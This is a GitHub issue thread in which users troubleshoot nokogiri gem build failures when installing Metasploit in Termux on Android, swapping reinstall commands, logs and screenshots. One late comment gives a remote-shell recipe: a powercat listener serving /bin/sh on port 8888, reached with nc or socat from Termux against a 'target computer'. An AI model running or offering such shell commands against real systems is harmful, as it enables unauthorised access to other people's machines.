### ISSUE TITLE
Issue in installing metasploit

### ISSUE THREAD

**Issue by ghost** [gushmazuko/metasploit_in_termux#187]
An error occurred while installing nokogiri             (1.8.0), and Bundler cannot continue.                   Make sure that `gem install nokogiri -v '1.8.0' --source
'https://rubygems.org/'` succeeds before bundling.

**Comment by dedshit** [comment]
gushmazuko is unavailable to approve my PR. so for now try my patch & send me feedback thanks 

[patch](https://github.com/dedshit/metasploit_in_termux/tree/patch-3)

**Comment by silverbullet-herr** [comment]
> gushmazuko is unavailable to approve my PR. so for now try my patch & send me feedback thanks
> 
> [patch](https://github.com/dedshit/metasploit_in_termux/tree/patch-3)

how to install this

**Comment by TheSenrai** [comment]
![20220924_172838](https://user-images.githubusercontent.com/114296883/192101836-d03f2a16-1604-4762-9cf3-a64b0986ae4b.jpg)
![20220924_172850](https://user-images.githubusercontent.com/114296883/192101846-890a6022-ee7c-462c-b5ec-7500f49ff30a.jpg)

**Comment by TheSenrai** [comment]
![20220924_173012](https://user-images.githubusercontent.com/114296883/192101906-9dadf027-4614-4f60-9ee7-9cb1d886d7fb.jpg)
![20220924_172902](https://user-images.githubusercontent.com/114296883/192101953-d1ff3fda-2f10-495a-9812-6c03db8f55d0.jpg)



all this happening

**Comment by TheSenrai** [comment]
1
![Screenshot_20220924-180833_Termux](https://user-images.githubusercontent.com/114296883/192102600-2dedc3ff-73b5-4ac3-9925-2532bdaaf025.jpg)
2
![Screenshot_20220924-180840_Termux](https://user-images.githubusercontent.com/114296883/192102616-dfccc86d-87fe-4416-a11c-03bef901a2d1.jpg)
3
![Screenshot_20220924-180848_Termux](https://user-images.githubusercontent.com/114296883/192102624-3f32022d-de09-42fe-8fa5-26c50db525f7.jpg)
4
![Screenshot_20220924-180910_Termux](https://user-images.githubusercontent.com/114296883/192102634-445e19ab-78c5-4e63-85af-bb8be43d2737.jpg)
5
![Screenshot_20220924-180917_Termux](https://user-images.githubusercontent.com/114296883/192102660-a375edce-ca76-4168-bd32-4beecb3838d0.jpg)
6
![Screenshot_20220924-180929_Termux](https://user-images.githubusercontent.com/114296883/192102678-f26c2451-1b97-4468-8c32-843df25a9ff6.jpg)
7
![Screenshot_20220924-180947_Termux](https://user-images.githubusercontent.com/114296883/192102688-a13f9874-e600-4fbb-8514-3dd0f01ca277.jpg)
8
![Screenshot_20220924-181004_Termux](https://user-images.githubusercontent.com/114296883/192102702-e0dfa03d-b71c-4d50-89bf-7670d33ada05.jpg)
9
![Screenshot_20220924-181008_Termux](https://user-images.githubusercontent.com/114296883/192102713-8d176582-3b8e-43fd-8772-acfbc6bfa18c.jpg)
10
![Screenshot_20220924-181016_Termux](https://user-images.githubusercontent.com/114296883/192102764-411fdc91-8ea6-47bb-9a3b-dfe64820a3de.jpg)
11
![Screenshot_20220924-181022_Termux](https://user-images.githubusercontent.com/114296883/192102781-226093fd-8979-4c93-8846-99e05f6c1ab6.jpg)
12 
![Screenshot_20220924-181030_Termux](https://user-images.githubusercontent.com/114296883/192102796-53d9097e-6e57-462a-93a1-3cd0e0cb54b0.jpg)

**Comment by dedshit** [comment]
> > gushmazuko is unavailable to approve my PR. so for now try my patch & send me feedback thanks
> > [patch](https://github.com/dedshit/metasploit_in_termux/tree/patch-3)
> 
> how to install this

use `git`

**Comment by krisdowis** [comment]
Old version of nokogiri and mini_portile2 & Ruby version are obsolete thats causes major problems during installation process.

**Comment by gushmazuko** [comment]
> 

Done. 
Thank you dude!

**Comment by gushmazuko** [comment]
> gushmazuko is unavailable to approve my PR. so for now try my patch & send me feedback thanks
> 
> [patch](https://github.com/dedshit/metasploit_in_termux/tree/patch-3)

Done.
Thank you dude!

**Comment by krisdowis** [comment]
Solved.
You can now fix the issue/error by reinstalling,
sorry for the wait.

**Comment by silverbullet-herr** [comment]
> @Rahulv95 @silverbullet-herr Solved. You can now fix the issue/error by reinstalling, sorry for the wait.

@Rahulv95 how did solve it ?

**Comment by TheSenrai** [comment]
what to do ? 
![Screenshot_20220925-123202_Termux](https://user-images.githubusercontent.com/114296883/192135119-395c4578-c4a6-48a3-a8eb-b457266b902d.jpg)
![Screenshot_20220925-123237_Termux](https://user-images.githubusercontent.com/114296883/192135127-5c2b17d1-fe35-499a-a5c0-e6f98d6f0868.jpg)
![Screenshot_20220925-123539_Termux](https://user-images.githubusercontent.com/114296883/192135134-d3407f5d-9861-4a8b-9951-6a47f4722140.jpg)
![Screenshot_20220925-123547_Termux](https://user-images.githubusercontent.com/114296883/192135137-2700955c-a3cc-436c-9202-9922b1d70b0e.jpg)

**Comment by silverbullet-herr** [comment]
> what to do ? ![Screenshot_20220925-123202_Termux](https://user-images.githubusercontent.com/114296883/192135119-395c4578-c4a6-48a3-a8eb-b457266b902d.jpg) ![Screenshot_20220925-123237_Termux](https://user-images.githubusercontent.com/114296883/192135127-5c2b17d1-fe35-499a-a5c0-e6f98d6f0868.jpg) ![Screenshot_20220925-123539_Termux](https://user-images.githubusercontent.com/114296883/192135134-d3407f5d-9861-4a8b-9951-6a47f4722140.jpg) ![Screenshot_20220925-123547_Termux](https://user-images.githubusercontent.com/114296883/192135137-2700955c-a3cc-436c-9202-9922b1d70b0e.jpg)

try this :
gem uninstall nokogiri
then install it using:
gem install nokogiri --platform=ruby -- --use-system-libraries 
the launch msfconsole and send sc

**Comment by dedshit** [comment]
> try this : gem uninstall nokogiri then install it using: gem install nokogiri --platform=ruby -- --use-system-libraries the launch msfconsole and send sc

thanks mate keep helping those who cant able to do that

**Comment by gushmazuko** [comment]
Check in progress: https://gitlab.com/gushmazuko/metasploit_in_termux/-/jobs/3080588481

**Comment by silverbullet-herr** [comment]
> > try this : gem uninstall nokogiri then install it using: gem install nokogiri --platform=ruby -- --use-system-libraries the launch msfconsole and send sc
> 
> thanks mate keep helping those who cant able to do that

anytimes bro 😁😁

**Comment by gushmazuko** [comment]
> Check in progress: https://gitlab.com/gushmazuko/metasploit_in_termux/-/jobs/3080588481

Build failed ))

**Comment by dedshit** [comment]
> > Check in progress: https://gitlab.com/gushmazuko/metasploit_in_termux/-/jobs/3080588481
> 
> Build failed ))

precompiled nokogiri gem causes this type of error `cannot load such file -- nokogiri/nokogiri (LoadError)` but it didn't happens for arm7

**Comment by gushmazuko** [comment]
Second [check](https://gitlab.com/gushmazuko/metasploit_in_termux/-/jobs/3080612076) with applied PR https://github.com/gushmazuko/metasploit_in_termux/pull/186

**Comment by dedshit** [comment]
> Second [check](https://gitlab.com/gushmazuko/metasploit_in_termux/-/jobs/3080612076) with applied PR #186

https://nokogiri.org/tutorials/installing_nokogiri.html#how-can-i-avoid-using-a-precompiled-native-gem

not to use precompiled gem to avoid this issue

**Comment by silverbullet-herr** [comment]
> Second [check](https://gitlab.com/gushmazuko/metasploit_in_termux/-/jobs/3080612076) with applied PR #186

i think it's an platform issue when i removed nokogiri and reinstalled it with : gem install nokogiri --platform=ruby -- --use-system-libraries 
it worked

**Comment by dedshit** [comment]
> > Second [check](https://gitlab.com/gushmazuko/metasploit_in_termux/-/jobs/3080612076) with applied PR #186
> 
> i think it's an platform issue when i removed nokogiri and reinstalled it with : gem install nokogiri --platform=ruby -- --use-system-libraries it worked



> Second [check](https://gitlab.com/gushmazuko/metasploit_in_termux/-/jobs/3080612076) with applied PR #186

![20220925_145134](https://user-images.githubusercontent.com/62318734/192136753-35df23c0-b974-44d2-beb4-f04ea78cb5d8.png)

as per @silverbullet-herr  issuse has been fixed by setting platform as **ruby**

@gushmazuko add **`--platform=ruby`** in **89** line after NOKOGIRI_VERSION.
also comment out line **93**

**Comment by gushmazuko** [comment]
> > > Second [check](https://gitlab.com/gushmazuko/metasploit_in_termux/-/jobs/3080612076) with applied PR #186
> > 
> > 
> > i think it's an platform issue when i removed nokogiri and reinstalled it with : gem install nokogiri --platform=ruby -- --use-system-libraries it worked
> 
> > Second [check](https://gitlab.com/gushmazuko/metasploit_in_termux/-/jobs/3080612076) with applied PR #186
> 
> ![20220925_145134](https://user-images.githubusercontent.com/62318734/192136753-35df23c0-b974-44d2-beb4-f04ea78cb5d8.png)
> 
> as per @silverbullet-herr issuse has been fixed by setting platform as **ruby**
> 
> @gushmazuko add **`--platform=ruby`** in **89** line after NOKOGIRI_VERSION. also comment out line **93**

In progress ))
![Screenshot_select-area_20220925113412](https://user-images.githubusercontent.com/34921843/192137151-77a60003-fbf0-4667-a364-22f0279d1ac8.png)

**Comment by gushmazuko** [comment]
Doesnt work, many error due to gems bundler

**Comment by dedshit** [comment]
is it asking to install bundler version 2.1.4 ?

**Comment by silverbullet-herr** [comment]
> Doesnt work, many errors due to gems bundler

i had to remove and reinstall sqlite3 using the same method after that then it worked 
send sc

**Comment by dedshit** [comment]
> > Doesnt work, many errors due to gems bundler
> 
> i had to remove and reinstall sqlite3 using the same method after that then it worked send sc



> 

if you dont mind can you do it starting ?

**Comment by gushmazuko** [comment]
> is it asking to install bundler version 2.1.4 ?

Log file: https://termbin.com/qgdp

**Comment by dedshit** [comment]
> Doesnt work, many errors due to gems bundler


try `gem install nokogiri --platform=ruby -- --use-system-libraries`

**Comment by gushmazuko** [comment]
> > Doesnt work, many errors due to gems bundler
> 
> try `gem install nokogiri --platform=ruby -- --use-system-libraries`

I already do it
![Screenshot_select-area_20220925120716](https://user-images.githubusercontent.com/34921843/192138272-8bfec33a-c494-44e5-b5ff-d7b019d5add6.png)

**Comment by dedshit** [comment]
> > Doesnt work, many errors due to gems bundler
> 
> i had to remove and reinstall sqlite3 using the same method after that then it worked send sc

@silverbullet-herr run this `gem list | grep -i sqlite3` and send ss i wanted to know sqlite3 version

**Comment by dedshit** [comment]
> > Doesnt work, many errors due to gems bundler
> 
> try `gem install nokogiri --platform=ruby -- --use-system-libraries`

can you manually run this above exact one ?

**Comment by silverbullet-herr** [comment]
> > > Doesnt work, many errors due to gems bundler
> > 
> > 
> > i had to remove and reinstall sqlite3 using the same method after that then it worked send sc
> 
> @silverbullet-herr run this `gem list | grep -i sqlite3` and send ss i wanted to know sqlite3 version

![Screenshot_20220925-112303_Termux](https://user-images.githubusercontent.com/64875326/192138812-a7fa5339-a12d-4b21-b544-2e20984ef747.png)

**Comment by silverbullet-herr** [comment]
> > > Doesnt work, many errors due to gems bundler
> > 
> > 
> > try `gem install nokogiri --platform=ruby -- --use-system-libraries`
> 
> I already do it ![Screenshot_select-area_20220925120716](https://user-images.githubusercontent.com/34921843/192138272-8bfec33a-c494-44e5-b5ff-d7b019d5add6.png)


![Screenshot_20220925-112127_Termux](https://user-images.githubusercontent.com/64875326/192138824-164369f7-6e04-408d-bb31-338d0706391b.png)

i had nokogiri 1.13.8 x86_64 i remove it and reinstalled the compatible version 
looks like your installing the incompatible one

**Comment by dedshit** [comment]
> > > Doesnt work, many errors due to gems bundler
> > 
> > 
> > i had to remove and reinstall sqlite3 using the same method after that then it worked send sc
> 
> > 
> 
> if you dont mind can you do it from starting ?

@silverbullet-herr will you ?

**Comment by silverbullet-herr** [comment]
> > > > Doesnt work, many errors due to gems bundler
> > > 
> > > 
> > > i had to remove and reinstall sqlite3 using the same method after that then it worked send sc
> > 
> > 
> > > 
> > 
> > 
> > if you dont mind can you do it from starting ?
> 
> @silverbullet-herr will you ?

i don't know bro i don't wanna ruin my installation
if it works don't touch it right?

**Comment by silverbullet-herr** [comment]
> > > > Doesnt work, many errors due to gems bundler
> > > 
> > > 
> > > i had to remove and reinstall sqlite3 using the same method after that then it worked send sc
> > 
> > 
> > > 
> > 
> > 
> > if you dont mind can you do it from starting ?
> 
> @silverbullet-herr will you ?

let someone install it and i'll show him the exact steps i made

**Comment by dedshit** [comment]
[log](https://controlc.com/c23ac015)

**Comment by gushmazuko** [comment]
> [log](https://controlc.com/c23ac015)

Poste here you installation file

**Comment by gushmazuko** [comment]
> gem list | grep -i sqlite3

Only this one: `sqlite3 (1.5.0 x86_64-linux)`

**Comment by dedshit** [comment]
> > [log](https://controlc.com/c23ac015)
> 
> Poste here you installation file

[metasploit.zip](https://github.com/gushmazuko/metasploit_in_termux/files/9640685/metasploit.zip)

**Comment by krisdowis** [comment]
Whats going on here?

**Comment by Arushmirza** [comment]
Plz solve this problem 
![Uploading Screenshot_20221212-192211_Termux.jpg…]()

**Comment by Arushmirza** [comment]
![Screenshot_20221212-192211_Termux](https://user-images.githubusercontent.com/120392828/207070384-a4746990-5e4e-4207-b3df-ba56d08ce93c.jpg)

**Comment by Stigerx** [comment]
So what should I do

**Comment by SebiOnGitHub** [comment]
Installing nokogiri 1.14.5 with native extensions
Gem::Ext::BuildError: ERROR: Failed to build gem native
extension.

current directory:
/data/data/com.termux/files/usr/lib/ruby/gems/3.2.0/gems/nokogiri-1.14.5/ext/nokogiri
/data/data/com.termux/files/usr/bin/ruby extconf.rb
--use-system-libraries
--with-xml2-include\=/data/data/com.termux/files/usr/include/libxml2
checking for whether -std=c99 is accepted as CFLAGS...
yes
checking for whether -Wno-declaration-after-statement is
accepted as CFLAGS... yes
checking for whether -O2 is accepted as CFLAGS... yes
checking for whether -g is accepted as CFLAGS... yes
checking for whether -Winline is accepted as CFLAGS...
yes
checking for whether -Wmissing-noreturn is accepted as
CFLAGS... yes
checking for whether -Wconversion -Wno-sign-conversion
is accepted as CFLAGS... yes
Building nokogiri using system libraries.
checking for gzdopen() in -lz... yes
checking for xmlParseDoc() in -lxml2... yes
checking for xsltParseStylesheetDoc() in -lxslt... yes
checking for exsltFuncRegister() in -lexslt... yes
Using mini_portile version 2.8.5
---------- IMPORTANT NOTICE ----------
Building Nokogiri with a packaged version of
libgumbo-1.0.0-nokogiri.
Configuration options: --enable-shared --disable-static
Copying gumbo-parser files into
tmp/aarch64-unknown-linux-android/ports/libgumbo/1.0.0-nokogiri/gumbo-parser...
Running 'compile' for libgumbo 1.0.0-nokogiri... OK
Activating libgumbo 1.0.0-nokogiri (from
ports/aarch64-linux-android/libgumbo/1.0.0-nokogiri)...
checking for whether
-I/data/data/com.termux/files/usr/lib/ruby/gems/3.2.0/gems/nokogiri-1.14.5/ext/nokogiri/ports/aarch64-linux-android/libgumbo/1.0.0-nokogiri/include
is accepted as CPPFLAGS... yes
checking for gumbo_parse_with_options() in
nokogiri_gumbo.h... yes
checking for xmlHasFeature()... yes
checking for xmlFirstElementChild()... yes
checking for xmlRelaxNGSetParserStructuredErrors()...
yes
checking for xmlRelaxNGSetValidStructuredErrors()... yes
checking for xmlSchemaSetValidStructuredErrors()... yes
checking for xmlSchemaSetParserStructuredErrors()... yes
checking for rb_gc_location()... yes
checking for rb_category_warning()... yes
checking for whether
-DNOKOGIRI_OTHER_LIBRARY_VERSIONS="\"libgumbo:1.0.0-nokogiri\""
is accepted as CPPFLAGS... yes
creating Makefile

current directory:
/data/data/com.termux/files/usr/lib/ruby/gems/3.2.0/gems/nokogiri-1.14.5/ext/nokogiri
make DESTDIR\= sitearchdir\=./.gem.20231128-876-he257
sitelibdir\=./.gem.20231128-876-he257 clean

current directory:
/data/data/com.termux/files/usr/lib/ruby/gems/3.2.0/gems/nokogiri-1.14.5/ext/nokogiri
make DESTDIR\= sitearchdir\=./.gem.20231128-876-he257
sitelibdir\=./.gem.20231128-876-he257
compiling gumbo.c
compiling html4_document.c
html4_document.c:49:52: error: incompatible function
pointer types passing 'void (void *, xmlErrorPtr)' (aka
'void (void *, struct _xmlError *)') to parameter of
type 'xmlStructuredErrorFunc' (aka 'void (*)(void *,
const struct _xmlError *)')
[-Wincompatible-function-pointer-types]
49 |   xmlSetStructuredErrorFunc((void
*)rb_error_list, Nokogiri_error_array_pusher);
|
^~~~~~~~~~~~~~~~~~~~~~~~~~~
/data/data/com.termux/files/usr/include/libxml2/libxml/xmlerror.h:898:29:
note: passing argument to parameter 'handler' here
898 |
xmlStructuredErrorFunc handler);
|
^
html4_document.c:109:52: error: incompatible function
pointer types passing 'void (void *, xmlErrorPtr)' (aka
'void (void *, struct _xmlError *)') to parameter of
type 'xmlStructuredErrorFunc' (aka 'void (*)(void *,
const struct _xmlError *)')
[-Wincompatible-function-pointer-types]
109 |   xmlSetStructuredErrorFunc((void
*)rb_error_list, Nokogiri_error_array_pusher);
|
^~~~~~~~~~~~~~~~~~~~~~~~~~~
/data/data/com.termux/files/usr/include/libxml2/libxml/xmlerror.h:898:29:
note: passing argument to parameter 'handler' here
898 |
xmlStructuredErrorFunc handler);
|
^
2 errors generated.
make: *** [Makefile:248: html4_document.o] Error 1

make failed, exit code 2

Gem files will remain installed in
/data/data/com.termux/files/usr/lib/ruby/gems/3.2.0/gems/nokogiri-1.14.5
for inspection.
Results logged to
/data/data/com.termux/files/usr/lib/ruby/gems/3.2.0/extensions/aarch64-linux-android/3.2.0/nokogiri-1.14.5/gem_make.out

An error occurred while installing nokogiri
(1.14.5), and Bundler cannot continue.
Make sure that `gem install nokogiri -v '1.14.5'
--source 'https://rubygems.org/'` succeeds before
bundling.

In Gemfile:
factory_bot_rails was resolved to 6.2.0, which depends
on
    railties was resolved to 7.0.8, which depends on
      actionpack was resolved to 7.0.8, which depends on
actionview was resolved to 7.0.8, which depends
on
rails-dom-testing was resolved to 2.2.0, which
depends on
            nokogiri

**Comment by HarleyWildman** [comment]
This has not been solved. No matter if I run bundle install or gem install nokogiri --platform=ruby -- --use-system-libraries or gem install Nokogiri_precompiled_aarch64_dedshit.  Always errors in Makefile:248: html4.document.o Error 1 or complains of xml bs void function. How do we solve this?  I also tried suggestions from other report $PREFIX/etc/resolv.config path changes.

**Comment by IamA2004** [comment]
Its not working I try everything but solution not here same problem An error occurred while installing nokogiri
(1.14.5), and Bundler cannot continue. 
What the hell

**Comment by hope3245** [comment]
We need to fix this bug.
Fix it.

**Comment by hope3245** [comment]
I need Ruby 3.5.0 now.
If you can find Ruby 3.5.0, please reply.

**Comment by HarleyWildman** [comment]
Do you mean Ruby SDK 3.5.0?  Because I think the latest stable release version is 3.3.5.

Get Outlook for iOS<https://aka.ms/o0ukef>
________________________________

**Comment by Gazmancyber** [comment]
Could not locate Gemfile
Could not locate Gemfile
Could not locate Gemfile

**Comment by Smithy1976** [comment]
Update the gem bundler:
gem update --system 3.5.22

Then it should install all missing gems!

**Comment by hope3245** [comment]
It seems like a new problem has been discovered. 
How can we solve it? 
We need to think about it.

**Comment by hope3245** [comment]
powercat -l -p 8888 -e /bin/sh -v: Type in Linux.

nc 192.168.1.32 8888: Type in Termux.

socat -d2 - TCP-CONNECT:192.168.1.32:8888: There is another way.

msfconsole: Now type in Termux.

However, this method requires that the target computer be turned on.

**Comment by Hitesh12343** [comment]
> > > Doesnt work, many errors due to gems bundler
> > 
> > i had to remove and reinstall sqlite3 using the same method after that then it worked send sc
> 
> 
> 
> > 
> 
> if you dont mind can you do it from starting ?

Can I help you?

**Comment by hope3245** [comment]
git clone https://github.com/gushmazuko/metasploit_in_termux.git: 1
cd metasploit*: 2
chmod 777 metasploit.sh: 3
./metasploit.sh: 4

Please reinstall version 0.119 and enter it. 
Thank you.

**Comment by Hitesh12343** [comment]
Hello

**Comment by Smithy1976** [comment]
You have to update the bundler (package manager) before you can install all the correct latest gems!

Sent from Outlook for Android<https://aka.ms/AAb9ysg>
________________________________

**Comment by Smithy1976** [comment]
gem update --system 3.6.9

Sent from Outlook for Android<https://aka.ms/AAb9ysg>
________________________________

**Comment by Smithy1976** [comment]
Here is a workable install:


  1.
git clone https://github.com/cyberkernelofficial/metasploit-in-termux


  1.
cd metasploit-in-termux

       3. bash msf.sh

(let script completely finish)

       4. gem update --system 3.6.9

(version number may change from time to time)

        5. bash msf.sh

(you must run script again to update installed gems)



Sent from Outlook for Android<https://aka.ms/AAb9ysg>
________________________________

**Comment by TurboDildo** [comment]
![Screenshot_20251107_133847_Termux.jpg](https://github.com/user-attachments/assets/d64ae373-d0ed-499c-9740-d2dc57070588)

what should I do, I've tried everything described above

**Comment by Smithy1976** [comment]
> ![Screenshot_20251107_133847_Termux.jpg](https://github.com/user-attachments/assets/d64ae373-d0ed-499c-9740-d2dc57070588)
> 
> what should I do, I've tried everything described above

Look through that output and find this line to update the bundler:

gem update --system 3.6.9

The version number may be different!

**Comment by Smithy1976** [comment]
> > ![Screenshot_20251107_133847_Termux.jpg](https://github.com/user-attachments/assets/d64ae373-d0ed-499c-9740-d2dc57070588)
> > what should I do, I've tried everything described above
> 
> Look through that output and find this line to update the bundler:
> 
> gem update --system 3.6.9
> 
> The version number may be different!

Then run script again.

**Comment by Smithy1976** [comment]
Latest nokogiri -v 1.18.8 won't install on latest termux ruby, will do some testing!

**Comment by ie8cjdmeiud** [comment]
1.18.10 issue

**Comment by ie8cjdmeiud** [comment]
> > > ![Screenshot_20251107_133847_Termux.jpg](https://github.com/user-attachments/assets/d64ae373-d0ed-499c-9740-d2dc57070588)
> > > what should I do, I've tried everything described above
> > 
> > 
> > Look through that output and find this line to update the bundler:
> > gem update --system 3.6.9
> > The version number may be different!
> 
> Then run script again.

Still not working for me
